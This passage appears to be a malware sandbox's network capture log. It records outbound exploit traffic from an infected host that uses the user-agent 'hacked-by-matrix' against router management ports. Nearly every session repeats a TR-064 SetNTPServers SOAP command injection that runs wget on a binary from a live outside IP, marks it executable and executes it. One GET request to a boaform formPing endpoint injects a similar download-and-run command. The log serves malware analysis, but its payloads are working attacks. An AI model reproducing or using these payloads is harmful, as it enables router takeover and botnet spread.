70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>
                                                        Mar 21, 2024 05:22:13.584821939 CET1286INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Keep-Alive: timeout=5, max=100
                                                        content-type: text/html
                                                        last-modified: Tue, 25 Jun 2019 07:01:36 GMT
                                                        etag: "999-5d11c6d0-22a3701833ded0e1;gz"
                                                        accept-ranges: bytes
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        content-length: 1159
                                                        date: Thu, 21 Mar 2024 04:22:12 GMT
                                                        server: LiteSpeed
                                                        platform: hostinger
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8d 73 63 71 10 b6 bb af be e1 60 49 5a 9a 65 2c 8d 68 63 8c fb 1d 67 fd b8 bf 4d 5a 68 ee 5d ca 12 d8 b2
                                                        Data Ascii: Vm6_l5utFbldK^ ;ob|HQE*go|<]d"Xfy*59>J3^PRpvwUKy,qfMZ#1rvr.O['Yl'NTXcC-2H[Wureg'<0G#>v1E^/cyZ.t%#<<0QuOk,D61bQg5i.tX(W0'!yHzHne=6"cm`;I@SIQ3m4GT7z~g2A&Ut59"D^De8dxh<vF>'^%oL:<&+PZj$0i'1#M@%Nbu+}Ed8NwoANXjF\(cStW(k,,[GftBncRX@YTE*Dxot_#t7:IhV;?MO&}o~F{~CMj]5O,>2dY?0(~eaP"LL{.fd!C]l21]izA=w6/;{YoH^77Yj\~[*F?h\q0@Ra<S3o7jz}q`Rpk-RgEQN0Sscq`IZe,hcgMZh]


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        339192.168.2.134623074.135.184.897547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:12.920814037 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        340192.168.2.133766494.30.238.2347547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:12.988145113 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        341192.168.2.134273699.231.7.197547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.063878059 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        342192.168.2.134624874.135.184.897547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.063958883 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        343192.168.2.1350432221.163.122.797547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.064263105 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        344192.168.2.1353326181.209.111.2281723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.149970055 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        345192.168.2.1341584104.172.71.617547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.162209034 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        346192.168.2.134274699.231.7.197547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.188086033 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        347192.168.2.133768494.30.238.2347547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.195251942 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        348192.168.2.133812046.0.165.1417547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.278568983 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:13.494126081 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 08:22:12 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        349192.168.2.1341594104.172.71.617547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.353693008 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        350192.168.2.1350454221.163.122.797547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.353915930 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        351192.168.2.133812846.0.165.1417547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.512465954 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:14.733300924 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:16.172313929 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:19.052253962 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:24.940696955 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:36.460333109 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:00.015332937 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:47.116224051 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        352192.168.2.1350460221.163.122.797547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:13.645281076 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
